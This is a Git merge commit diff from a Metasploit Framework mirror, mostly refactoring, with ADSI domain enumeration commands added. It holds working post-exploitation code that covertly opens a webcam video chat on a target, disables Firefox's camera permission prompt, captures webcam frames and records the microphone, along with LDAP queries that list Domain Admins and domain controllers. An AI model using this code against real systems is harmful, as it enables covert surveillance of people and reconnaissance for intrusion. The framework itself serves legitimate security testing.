infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'upstream/master' into adsi-file-output

bug/bundler_fix
OJ 2015-09-01 17:23:32 +10:00
parent ef73f56201 1b778d0650
commit 696bc95838
79 changed files with 602 additions and 5377 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Gemfile.lock
View File

@ -9,7 +9,7 @@ PATH
json
metasploit-concern (= 1.0.0)
metasploit-model (= 1.0.0)
metasploit-payloads (= 1.0.9)
metasploit-payloads (= 1.0.10)
msgpack
nokogiri
packetfu (= 1.1.9)
@ -123,7 +123,7 @@ GEM
activemodel (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-payloads (1.0.9)
metasploit-payloads (1.0.10)
metasploit_data_models (1.2.5)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)

1116
data/meterpreter/ext_server_stdapi.php
View File

File diff suppressed because it is too large Load Diff

1583
data/meterpreter/ext_server_stdapi.py
View File

File diff suppressed because it is too large Load Diff

1249
data/meterpreter/meterpreter.php
View File

File diff suppressed because it is too large Load Diff

1111
data/meterpreter/meterpreter.py
View File

File diff suppressed because it is too large Load Diff

6
data/webcam/offerer.html
View File

@ -169,7 +169,7 @@
userid: 'self',
stream: stream
});
callback(stream);
});
}
@ -178,7 +178,7 @@
<body>
<div class="windowa" id="windowa">
<b>You peer</b>
<b>Your peer</b>
</div>
<div class="dot1"></div>
@ -199,4 +199,4 @@
</div>
</body>
</html>
</html>

53
lib/msf/ui/console/command_dispatcher/db.rb
View File

@ -89,6 +89,7 @@ class Db
print_line " workspace [name] Switch workspace"
print_line " workspace -a [name] ... Add workspace(s)"
print_line " workspace -d [name] ... Delete workspace(s)"
print_line " workspace -D Delete all workspaces"
print_line " workspace -r <old> <new> Rename workspace"
print_line " workspace -h Show this help information"
print_line
@ -106,6 +107,8 @@ class Db
adding = true
when '-d','--del'
deleting = true
when '-D','--delete-all'
delete_all = true
when '-r','--rename'
renaming = true
else
@ -123,28 +126,9 @@ class Db
end
framework.db.workspace = workspace
elsif deleting and names
switched = false
# Delete workspaces
names.each do |name|
workspace = framework.db.find_workspace(name)
if workspace.nil?
print_error("Workspace not found: #{name}")
elsif workspace.default?
workspace.destroy
workspace = framework.db.add_workspace(name)
print_status("Deleted and recreated the default workspace")
else
# switch to the default workspace if we're about to delete the current one
if framework.db.workspace.name == workspace.name
framework.db.workspace = framework.db.default_workspace
switched = true
end
# now destroy the named workspace
workspace.destroy
print_status("Deleted workspace: #{name}")
end
end
print_status("Switched workspace: #{framework.db.workspace.name}") if switched
delete_workspaces(names)
elsif delete_all
delete_workspaces(framework.db.workspaces.map(&:name))
elsif renaming
if names.length != 2
print_error("Wrong number of arguments to rename")
@ -202,6 +186,31 @@ class Db
}
end
def delete_workspaces(names)
switched = false
# Delete workspaces
names.each do |name|
workspace = framework.db.find_workspace(name)
if workspace.nil?
print_error("Workspace not found: #{name}")
elsif workspace.default?
workspace.destroy
workspace = framework.db.add_workspace(name)
print_status("Deleted and recreated the default workspace")
else
# switch to the default workspace if we're about to delete the current one
if framework.db.workspace.name == workspace.name
framework.db.workspace = framework.db.default_workspace
switched = true
end
# now destroy the named workspace
workspace.destroy
print_status("Deleted workspace: #{name}")
end
end
print_status("Switched workspace: #{framework.db.workspace.name}") if switched
end
def cmd_workspace_tabs(str, words)
return [] unless active?
framework.db.workspaces.map { |s| s.name } if (words & ['-a','--add']).empty?

9
lib/rex/compat.rb
View File

@ -166,9 +166,9 @@ def self.open_webrtc_browser(url='http://google.com/')
app_data = ENV['APPDATA']
paths << "#{app_data}\\Google\\Chrome\\Application\\chrome.exe"
paths.each do |p|
if File.exists?(p)
args = (p =~ /chrome\.exe/) ? "--allow-file-access-from-files" : ""
paths.each do |path|
if File.exists?(path)
args = (path =~ /chrome\.exe/) ? "--allow-file-access-from-files" : ""
system("#{path} #{args} #{url}")
found_browser = true
break
@ -188,13 +188,14 @@ def self.open_webrtc_browser(url='http://google.com/')
end
else
if defined? ENV['PATH']
['chrome', 'chromium', 'firefox', 'opera'].each do |browser|
['firefox', 'google-chrome', 'chrome', 'chromium', 'firefox', 'opera'].each do |browser|
ENV['PATH'].split(':').each do |path|
browser_path = "#{path}/#{browser}"
if File.exists?(browser_path)
args = (browser_path =~ /Chrome/) ? "--allow-file-access-from-files" : ""
system("#{browser_path} #{args} #{url} &")
found_browser = true
break
end
end
end

70
lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
View File

@ -1,7 +1,5 @@
# -*- coding: binary -*-
#require 'rex/post/meterpreter/extensions/process'
module Rex
module Post
module Meterpreter
@ -15,7 +13,6 @@ module Webcam
#
###
class Webcam
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::WebRTC
@ -31,9 +28,9 @@ class Webcam
def webcam_list
response = client.send_request(Packet.create_request('webcam_list'))
names = []
response.get_tlvs( TLV_TYPE_WEBCAM_NAME ).each{ |tlv|
response.get_tlvs(TLV_TYPE_WEBCAM_NAME).each do |tlv|
names << tlv.value
}
end
names
end
@ -49,11 +46,11 @@ class Webcam
request = Packet.create_request('webcam_get_frame')
request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)
response = client.send_request(request)
response.get_tlv( TLV_TYPE_WEBCAM_IMAGE ).value
response.get_tlv(TLV_TYPE_WEBCAM_IMAGE).value
end
def webcam_stop
client.send_request( Packet.create_request( 'webcam_stop' ) )
client.send_request(Packet.create_request('webcam_stop'))
true
end
@ -67,13 +64,13 @@ class Webcam
offerer_id = Rex::Text.rand_text_alphanumeric(10)
channel = Rex::Text.rand_text_alphanumeric(20)
remote_browser_path = get_webrtc_browser_path
remote_browser_path = webrtc_browser_path
if remote_browser_path.blank?
raise RuntimeError, "Unable to find a suitable browser on the target machine"
fail "Unable to find a suitable browser on the target machine"
end
ready_status = init_video_chat(remote_browser_path, server, channel, offerer_id)
init_video_chat(remote_browser_path, server, channel, offerer_id)
connect_video_chat(server, channel, offerer_id)
end
@ -83,40 +80,39 @@ class Webcam
request = Packet.create_request('webcam_audio_record')
request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)
response = client.send_request(request)
response.get_tlv( TLV_TYPE_AUDIO_DATA ).value
response.get_tlv(TLV_TYPE_AUDIO_DATA).value
end
attr_accessor :client
private
#
# Returns a browser path that supports WebRTC
#
# @return [String]
#
def get_webrtc_browser_path
def webrtc_browser_path
found_browser_path = ''
case client.platform
when /win/
paths = [
"Program Files\\Google\\Chrome\\Application\\chrome.exe",
"Program Files\\Mozilla Firefox\\firefox.exe"
"%ProgramFiles(x86)%\\Google\\Chrome\\Application\\chrome.exe",
"%ProgramFiles%\\Google\\Chrome\\Application\\chrome.exe",
"%ProgramW6432%\\Google\\Chrome\\Application\\chrome.exe",
"%ProgramFiles(x86)%\\Mozilla Firefox\\firefox.exe",
"%ProgramFiles%\\Mozilla Firefox\\firefox.exe",
"%ProgramW6432%\\Mozilla Firefox\\firefox.exe"
]
drive = session.sys.config.getenv("SYSTEMDRIVE")
paths = paths.map { |p| "#{drive}\\#{p}" }
# Old chrome path
user_profile = client.sys.config.getenv("USERPROFILE")
paths << "#{user_profile}\\Local Settings\\Application Data\\Google\\Chrome\\Application\\chrome.exe"
paths.each do |browser_path|
if file?(browser_path)
found_browser_path = browser_path
found_browser_path = client.fs.file.expand_path(browser_path)
break
end
end
@ -124,7 +120,7 @@ class Webcam
when /osx|bsd/
[
'/Applications/Google Chrome.app',
'/Applications/Firefox.app',
'/Applications/Firefox.app'
].each do |browser_path|
if file?(browser_path)
found_browser_path = browser_path
@ -140,7 +136,6 @@ class Webcam
found_browser_path
end
#
# Creates a video chat session as an offerer... involuntarily :-p
# Windows targets only.
@ -161,9 +156,9 @@ class Webcam
begin
write_file("#{tmp_dir}\\interface.html", interface)
write_file("#{tmp_dir}\\api.js", api)
rescue ::Exception => e
elog("webcam_chat failed. #{e.class} #{e.to_s}")
raise RuntimeError, "Unable to initialize the interface on the target machine"
rescue RuntimeError => e
elog("webcam_chat failed. #{e.class} #{e}")
raise "Unable to initialize the interface on the target machine"
end
#
@ -176,26 +171,29 @@ class Webcam
profile_name = Rex::Text.rand_text_alpha(8)
o = cmd_exec("#{remote_browser_path} --CreateProfile #{profile_name} #{tmp_dir}\\#{profile_name}")
profile_path = (o.scan(/created profile '.+' at '(.+)'/).flatten[0] || '').strip
setting = %Q|user_pref("media.navigator.permission.disabled", true);|
setting = %|user_pref("media.navigator.permission.disabled", true);|
begin
write_file(profile_path, setting)
rescue ::Exception => e
elog("webcam_chat failed: #{e.class} #{e.to_s}")
raise RuntimeError, "Unable to write the necessary setting for Firefox."
rescue RuntimeError => e
elog("webcam_chat failed: #{e.class} #{e}")
raise "Unable to write the necessary setting for Firefox."
end
args = "-p #{profile_name}"
end
exec_opts = {'Hidden' => false, 'Channelized' => false}
exec_opts = { 'Hidden' => false, 'Channelized' => false }
begin
session.sys.process.execute(remote_browser_path, "#{args} #{tmp_dir}\\interface.html", exec_opts)
rescue ::Exception => e
elog("webcam_chat failed. #{e.class} #{e.to_s}")
raise RuntimeError, "Unable to start the remote browser: #{e.message}"
rescue RuntimeError => e
elog("webcam_chat failed. #{e.class} #{e}")
raise "Unable to start the remote browser: #{e.message}"
end
end
end
end; end; end; end; end; end
end
end
end
end
end
end

195
lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb
View File

@ -26,9 +26,12 @@ class Console::CommandDispatcher::Extapi::Adsi
#
def commands
{
'adsi_user_enum' => 'Enumerate all users on the specified domain.',
'adsi_computer_enum' => 'Enumerate all computers on the specified domain.',
'adsi_domain_query' => 'Enumerate all objects on the specified domain that match a filter.'
'adsi_user_enum' => 'Enumerate all users on the specified domain.',
'adsi_group_enum' => 'Enumerate all groups on the specified domain.',
'adsi_nested_group_user_enum' => 'Recursively enumerate users who are effectively members of the group specified.',
'adsi_computer_enum' => 'Enumerate all computers on the specified domain.',
'adsi_dc_enum' => 'Enumerate all domain controllers on the specified domain.',
'adsi_domain_query' => 'Enumerate all objects on the specified domain that match a filter.'
}
end
@ -39,24 +42,68 @@ class Console::CommandDispatcher::Extapi::Adsi
'Extapi: ADSI Management'
end
#
# Options for the adsi_nested_group_user_enum command.
#
@@adsi_nested_group_user_enum_opts = Rex::Parser::Arguments.new(
'-h' => [false, 'Help banner'],
'-o' => [true, 'Path to output file.'],
'-m' => [true, 'Maximum results to return.'],
'-p' => [true, 'Result set page size.']
)
def adsi_nested_group_user_enum_usage
print_line('USAGE:')
print_line(' adsi_nested_group_user_enum <domain> <Group DN> [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line
print_line('DESCRIPTION:')
print_line(' Enumerate the users who are members of the named group, taking nested groups into account.')
print_line(' For example, specifying the "Domain Admins" group DN will list all users who are effectively')
print_line(' members of the Domain Admins group, even if they are in practice members of intermediary groups.')
print_line
print_line('EXAMPLE:')
print_line(' The example below will list all members of the "Domain Admins" group on the STUFUS domain:')
print_line(' adsi_nested_group_user_enum STUFUS "CN=Domain Admins,CN=Users,DC=mwrinfosecurity,DC=com"')
print_line(@@adsi_nested_group_user_enum_opts.usage)
end
#
# Enumerate domain groups.
#
def cmd_adsi_nested_group_user_enum(*args)
args.unshift('-h') if args.length == 0
if args.include?('-h') || args.length < 2
adsi_nested_group_user_enum_usage
return true
end
domain = args.shift
groupdn = args.shift
# This OID (canonical name = LDAP_MATCHING_RULE_IN_CHAIN) will recursively search each 'memberof' parent
# https://support.microsoft.com/en-us/kb/275523 for more information -stufus
filter = "(&(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=#{groupdn}))"
fields = ['samaccountname', 'name', 'distinguishedname', 'description', 'comment']
args = [domain, filter] + fields + args
return cmd_adsi_domain_query(*args)
end
#
# Options for the adsi_user_enum command.
#
@@adsi_user_enum_opts = Rex::Parser::Arguments.new(
'-h' => [false, 'Help banner'],
'-o' => [true, 'Path to output file'],
'-h' => [false, 'Help banner.'],
'-o' => [true, 'Path to output file.'],
'-m' => [true, 'Maximum results to return.'],
'-p' => [true, 'Result set page size.']
)
def adsi_user_enum_usage
print_line()
print_line('Usage: adsi_user_enum <domain> [-h] [-m maxresults] [-p pagesize] [-o file]'
print_line()
print_line('Enumerate the users on the target domain.')
print_line()
print_line('Enumeration returns information such as the user name, SAM account name, locked')
print_line('status, desc, and comment.')
print_line('USAGE:')
print_line(' adsi_user_enum <domain> [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line
print_line('DESCRIPTION:')
print_line(' Enumerate all users on the target domain.')
print_line(' Enumeration returns information such as the user name, SAM account name, status, comments etc')
print_line(@@adsi_user_enum_opts.usage)
end
@ -77,23 +124,62 @@ class Console::CommandDispatcher::Extapi::Adsi
return cmd_adsi_domain_query(*args)
end
#
# Options for the adsi_group_enum command.
#
@@adsi_group_enum_opts = Rex::Parser::Arguments.new(
'-h' => [false, 'Help banner.'],
'-o' => [true, 'Path to output file.'],
'-m' => [true, 'Maximum results to return.'],
'-p' => [true, 'Result set page size.']
)
def adsi_group_enum_usage
print_line('USAGE:')
print_line(' adsi_nested_group_user_enum <domain> [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line
print_line('DESCRIPTION:')
print_line(' Enumerate all groups on the target domain.')
print_line
print_line('EXAMPLE:')
print_line(' The example below will list all groups on the STUFUS domain.')
print_line(' adsi_group_enum STUFUS')
print_line(@@adsi_group_enum_opts.usage)
end
#
# Enumerate domain groups.
#
def cmd_adsi_group_enum(*args)
args.unshift('-h') if args.length == 0
if args.include?('-h')
adsi_group_enum_usage
return true
end
domain = args.shift
filter = '(objectClass=group)'
fields = ['name', 'distinguishedname', 'description',]
args = [domain, filter] + fields + args
return cmd_adsi_domain_query(*args)
end
#
# Options for the adsi_computer_enum command.
#
@@adsi_computer_enum_opts = Rex::Parser::Arguments.new(
'-h' => [false, 'Help banner'],
'-o' => [true, 'Path to output file'],
'-m' => [true, 'Maximum results to return'],
'-p' => [true, 'Result set page size']
'-h' => [false, 'Help banner.'],
'-o' => [true, 'Path to output file.'],
'-m' => [true, 'Maximum results to return.'],
'-p' => [true, 'Result set page size.']
)
def adsi_computer_enum_usage
print_line()
print_line('Usage: adsi_computer_enum <domain> [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line()
print_line('Enumerate the computers on the target domain.')
print_line()
print_line('Enumeration returns information such as the computer name, desc, and comment.')
print_line('USAGE:')
print_line(' adsi_computer_enum <domain> [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line
print_line('DESCRIPTION:')
print_line(' Enumerate all computers on the target domain.')
print_line(@@adsi_computer_enum_opts.usage)
end
@ -109,7 +195,47 @@ class Console::CommandDispatcher::Extapi::Adsi
domain = args.shift
filter = '(objectClass=computer)'
fields = ['name', 'distinguishedname', 'description', 'comment']
fields = ['name', 'dnshostname', 'distinguishedname', 'operatingsystem',
'operatingsystemversion', 'operatingsystemservicepack', 'description',
'comment' ]
args = [domain, filter] + fields + args
return cmd_adsi_domain_query(*args)
end
#
# Options for the adsi_dc_enum command.
#
@@adsi_dc_enum_opts = Rex::Parser::Arguments.new(
'-h' => [false, 'Help banner.'],
'-o' => [true, 'Path to output file.'],
'-m' => [true, 'Maximum results to return.'],
'-p' => [true, 'Result set page size.']
)
def adsi_dc_enum_usage
print_line('USAGE:')
print_line(' adsi_dc_enum <domain> [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line
print_line('DESCRIPTION:')
print_line(' Enumerate the domain controllers on the target domain.')
print_line(@@adsi_dc_enum_opts.usage)
end
#
# Enumerate domain dcs.
#
def cmd_adsi_dc_enum(*args)
args.unshift('-h') if args.length == 0
if args.include?('-h')
adsi_dc_enum_usage
return true
end
domain = args.shift
# This LDAP filter will pull out domain controllers
filter = '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
fields = ['name', 'dnshostname', 'distinguishedname', 'operatingsystem',
'operatingsystemversion', 'operatingsystemservicepack', 'description', 'comment' ]
args = [domain, filter] + fields + args
return cmd_adsi_domain_query(*args)
end
@ -118,19 +244,18 @@ class Console::CommandDispatcher::Extapi::Adsi
# Options for the adsi_domain_query command.
#
@@adsi_domain_query_opts = Rex::Parser::Arguments.new(
'-h' => [false, 'Help banner'],
'-o' => [true, 'Path to output file'],
'-m' => [true, 'Maximum results to return'],
'-p' => [true, 'Result set page size']
'-h' => [false, 'Help banner.'],
'-o' => [true, 'Path to output file.'],
'-m' => [true, 'Maximum results to return.'],
'-p' => [true, 'Result set page size.']
)
def adsi_domain_query_usage
print_line()
print_line('Usage: adsi_domain_query <domain> <filter> <field 1> [field 2 [field ..]] [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line()
print_line('Enumerate the objects on the target domain.')
print_line()
print_line('Enumeration returns the set of fields that are specified.')
print_line('USAGE:')
print_line(' adsi_domain_query <domain> <filter> <field 1> [field 2 [field ..]] [-h] [-m maxresults] [-p pagesize] [-o file]')
print_line
print_line('DESCRIPTION:')
print_line(' Enumerates the objects on the target domain, returning the set of fields that are specified.')
print_line(@@adsi_domain_query_opts.usage)
end
@ -180,10 +305,10 @@ class Console::CommandDispatcher::Extapi::Adsi
table << to_table_row(c)
end
print_line()
print_line
print_line(table.to_s)
print_line("Total objects: #{objects[:results].length}")
print_line()
print_line
if output_file
::File.open(output_file, 'w') do |f|

237
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
View File

@ -12,7 +12,6 @@ module Ui
#
###
class Console::CommandDispatcher::Stdapi::Webcam
Klass = Console::CommandDispatcher::Stdapi::Webcam
include Console::CommandDispatcher
@ -33,17 +32,16 @@ class Console::CommandDispatcher::Stdapi::Webcam
"webcam_list" => [ "webcam_list" ],
"webcam_snap" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
"webcam_stream" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
"record_mic" => [ "webcam_audio_record" ],
"record_mic" => [ "webcam_audio_record" ]
}
all.delete_if do |cmd, desc|
all.delete_if do |cmd, _desc|
del = false
reqs[cmd].each do |req|
next if client.commands.include? req
del = true
break
end
del
end
@ -58,23 +56,26 @@ class Console::CommandDispatcher::Stdapi::Webcam
end
def cmd_webcam_list
begin
client.webcam.webcam_list.each_with_index { |name, indx|
print_line("#{indx + 1}: #{name}")
}
return true
rescue
if client.webcam.webcam_list.length == 0
print_error("No webcams were found")
return false
return
end
client.webcam.webcam_list.each_with_index do |name, indx|
print_line("#{indx + 1}: #{name}")
end
end
def cmd_webcam_snap(*args)
if client.webcam.webcam_list.length == 0
print_error("Target does not have a webcam")
return
end
path = Rex::Text.rand_text_alpha(8) + ".jpeg"
quality = 50
view = true
index = 1
wc_list = []
webcam_snap_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner" ],
@ -84,51 +85,44 @@ class Console::CommandDispatcher::Stdapi::Webcam
"-v" => [ true, "Automatically view the JPEG image (Default: '#{view}')" ]
)
webcam_snap_opts.parse( args ) { | opt, idx, val |
webcam_snap_opts.parse(args) do |opt, _idx, val|
case opt
when "-h"
print_line( "Usage: webcam_snap [options]\n" )
print_line( "Grab a frame from the specified webcam." )
print_line( webcam_snap_opts.usage )
return
when "-i"
index = val.to_i
when "-q"
quality = val.to_i
when "-p"
path = val
when "-v"
view = false if ( val =~ /^(f|n|0)/i )
when "-h"
print_line("Usage: webcam_snap [options]\n")
print_line("Grab a frame from the specified webcam.")
print_line(webcam_snap_opts.usage)
return
when "-i"
index = val.to_i
when "-q"
quality = val.to_i
when "-p"
path = val
when "-v"
view = false if val =~ /^(f|n|0)/i
end
}
begin
wc_list << client.webcam.webcam_list
rescue
end
if wc_list.length > 0
begin
print_status("Starting...")
client.webcam.webcam_start(index)
data = client.webcam.webcam_get_frame(quality)
print_good("Got frame")
ensure
client.webcam.webcam_stop
print_status("Stopped")
end
if( data )
::File.open( path, 'wb' ) do |fd|
fd.write( data )
end
path = ::File.expand_path( path )
print_line( "Webcam shot saved to: #{path}" )
Rex::Compat.open_file( path ) if view
end
return true
else
print_error("No webcams where found")
return false
begin
print_status("Starting...")
client.webcam.webcam_start(index)
webcam_started = true
data = client.webcam.webcam_get_frame(quality)
print_good("Got frame")
ensure
client.webcam.webcam_stop if webcam_started
print_status("Stopped")
end
if data
::File.open(path, 'wb') do |fd|
fd.write(data)
end
path = ::File.expand_path(path)
print_line("Webcam shot saved to: #{path}")
Rex::Compat.open_file(path) if view
end
true
end
def cmd_webcam_chat(*args)
@ -144,39 +138,42 @@ class Console::CommandDispatcher::Stdapi::Webcam
"-s" => [ false, "WebSocket server" ]
)
webcam_chat_opts.parse( args ) { | opt, idx, val |
webcam_chat_opts.parse(args) do |opt, _idx, val|
case opt
when "-h"
print_line( "Usage: webcam_chat [options]\n" )
print_line( "Starts a video conversation with your target." )
print_line( "Browser Requirements:")
print_line( "Chrome: version 23 or newer" )
print_line( "Firefox: version 22 or newer" )
print_line( webcam_chat_opts.usage )
return
when "-s"
server = val.to_s
when "-h"
print_line("Usage: webcam_chat [options]\n")
print_line("Starts a video conversation with your target.")
print_line("Browser Requirements:")
print_line("Chrome: version 23 or newer")
print_line("Firefox: version 22 or newer")
print_line(webcam_chat_opts.usage)
return
when "-s"
server = val.to_s
end
}
end
begin
print_status("Webcam chat session initialized.")
client.webcam.webcam_chat(server)
rescue RuntimeError => e
rescue RuntimeError => e
print_error(e.message)
end
end
def cmd_webcam_stream(*args)
if client.webcam.webcam_list.length == 0
print_error("Target does not have a webcam")
return
end
print_status("Starting...")
stream_path = Rex::Text.rand_text_alpha(8) + ".jpeg"
stream_path = Rex::Text.rand_text_alpha(8) + ".jpeg"
player_path = Rex::Text.rand_text_alpha(8) + ".html"
duration = 1800
quality = 50
view = true
index = 1
wc_list = []
webcam_snap_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner" ],
@ -188,30 +185,30 @@ class Console::CommandDispatcher::Stdapi::Webcam
"-v" => [ true, "Automatically view the stream (Default: '#{view}')" ]
)
webcam_snap_opts.parse( args ) { | opt, idx, val |
webcam_snap_opts.parse(args) do |opt, _idx, val|
case opt
when "-h"
print_line( "Usage: webcam_stream [options]\n" )
print_line( "Stream from the specified webcam." )
print_line( webcam_snap_opts.usage )
return
when "-d"
duration = val.to_i
when "-i"
index = val.to_i
when "-q"
quality = val.to_i
when "-s"
stream_path = val
when "-t"
player_path = val
when "-v"
view = false if ( val =~ /^(f|n|0)/i )
when "-h"
print_line("Usage: webcam_stream [options]\n")
print_line("Stream from the specified webcam.")
print_line(webcam_snap_opts.usage)
return
when "-d"
duration = val.to_i
when "-i"
index = val.to_i
when "-q"
quality = val.to_i
when "-s"
stream_path = val
when "-t"
player_path = val
when "-v"
view = false if val =~ /^(f|n|0)/i
end
}
end
print_status("Preparing player...")
html = %Q|<html>
html = %|<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
@ -264,7 +261,7 @@ Status : <span id="status"></span>
end
if view
print_status("Opening player at: #{player_path}")
Rex::Compat.open_file(player_path)
Rex::Compat.open_file(player_path)
else
print_status("Please open the player manually with a browser: #{player_path}")
end
@ -272,72 +269,70 @@ Status : <span id="status"></span>
print_status("Streaming...")
begin
client.webcam.webcam_start(index)
::Timeout.timeout(duration) {
webcam_started = true
::Timeout.timeout(duration) do
while client do
data = client.webcam.webcam_get_frame(quality)
if data
::File.open(stream_path, 'wb') do |f|
f.write(data)
f.write(data)
end
data = nil
end
end
}
end
rescue ::Timeout::Error
ensure
client.webcam.webcam_stop
client.webcam.webcam_stop if webcam_started
end
print_status("Stopped")
end
def cmd_record_mic(*args)
path = Rex::Text.rand_text_alpha(8) + ".wav"
play = true
duration = 1
path = Rex::Text.rand_text_alpha(8) + ".wav"
play = true
duration = 1
record_mic_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner" ],
"-d" => [ true, "Number of seconds to record (Default: 1)" ],
"-f" => [ true, "The wav file path (Default: '#{::File.expand_path( "[randomname].wav" )}')" ],
"-f" => [ true, "The wav file path (Default: '#{::File.expand_path('[randomname].wav')}')" ],
"-p" => [ true, "Automatically play the captured audio (Default: '#{play}')" ]
)
record_mic_opts.parse( args ) { | opt, idx, val |
record_mic_opts.parse(args) do |opt, _idx, val|
case opt
when "-h"
print_line( "Usage: record_mic [options]\n" )
print_line( "Records audio from the default microphone." )
print_line( record_mic_opts.usage )
return
when "-d"
duration = val.to_i
when "-f"
path = val
when "-p"
play = false if ( val =~ /^(f|n|0)/i )
when "-h"
print_line("Usage: record_mic [options]\n")
print_line("Records audio from the default microphone.")
print_line(record_mic_opts.usage)
return
when "-d"
duration = val.to_i
when "-f"
path = val
when "-p"
play = false if val =~ /^(f|n|0)/i
end
}
end
print_status("Starting...")
data = client.webcam.record_mic(duration)
print_status("Stopped")
if( data )
::File.open( path, 'wb' ) do |fd|
fd.write( data )
if data
::File.open(path, 'wb') do |fd|
fd.write(data)
end
path = ::File.expand_path( path )
print_line( "Audio saved to: #{path}" )
Rex::Compat.play_sound( path ) if play
path = ::File.expand_path(path)
print_line("Audio saved to: #{path}")
Rex::Compat.play_sound(path) if play
end
return true
true
end
end
end
end
end
end
end

2
metasploit-framework.gemspec
View File

@ -61,7 +61,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model', '1.0.0'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.0.9'
spec.add_runtime_dependency 'metasploit-payloads', '1.0.10'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# Needed by anemone crawler

2
modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb
View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>

2
modules/exploits/linux/http/gitlist_exec.rb
View File

@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl',
'RequiredCmd' => 'generic telnet python perl gawk netcat netcat-e ruby php openssl',
}
},
'Targets' =>

2
modules/exploits/linux/http/kloxo_sqli.rb
View File

@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python gawk bash-tcp netcat'
'RequiredCmd' => 'generic perl python gawk netcat'
}
},
'Targets' =>

2
modules/exploits/linux/http/openfiler_networkcard_exec.rb
View File

@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash',
'RequiredCmd' => 'generic telnet python perl',
}
},
'Targets' =>

2
modules/exploits/linux/http/railo_cfml_rfi.rb
View File

@ -38,7 +38,7 @@ class Metasploit4 < Msf::Exploit::Remote
'DisableNops' => true,
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat perl ruby python bash telnet'
'RequiredCmd' => 'generic netcat perl ruby python telnet'
}
},
'Platform' => %w( unix ),

2
modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb
View File

@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet'
'RequiredCmd' => 'generic perl telnet'
}
},
'Platform' => ['unix'],

2
modules/exploits/linux/http/zen_load_balancer_exec.rb
View File

@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat netcat-e perl bash',
'RequiredCmd' => 'generic netcat netcat-e perl',
}
},
'Targets' =>

2
modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
View File

@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic python perl bash',
'RequiredCmd' => 'generic python perl',
},
'Targets' =>
[

2
modules/exploits/linux/misc/accellion_fta_mpipe2.rb
View File

@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'RequiredCmd' => 'generic perl ruby telnet',
}
},
'Targets' =>

2
modules/exploits/linux/misc/nagios_nrpe_arguments.rb
View File

@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl python ruby bash telnet',
'RequiredCmd' => 'perl python ruby telnet',
# *_perl, *_python and *_ruby work if they are installed
}
},

2
modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'ConnectionType' => 'find',
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet'
'RequiredCmd' => 'generic perl ruby python telnet'
}
},
'Platform' => %w{ bsd linux osx unix win },

2
modules/exploits/multi/http/cups_bash_env_exec.rb
View File

@ -41,7 +41,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic bash awk ruby'
'RequiredCmd' => 'generic awk ruby'
},
# Tested:
